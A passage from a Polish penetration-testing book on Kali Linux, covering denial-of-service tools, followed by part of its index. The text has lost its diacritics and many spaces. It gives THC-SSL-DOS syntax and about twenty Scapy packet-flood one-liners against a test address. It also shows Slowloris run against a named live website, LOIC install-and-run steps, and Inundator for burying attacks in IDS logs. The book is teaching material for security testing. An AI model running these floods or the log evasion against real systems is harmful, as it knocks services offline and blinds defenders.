Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
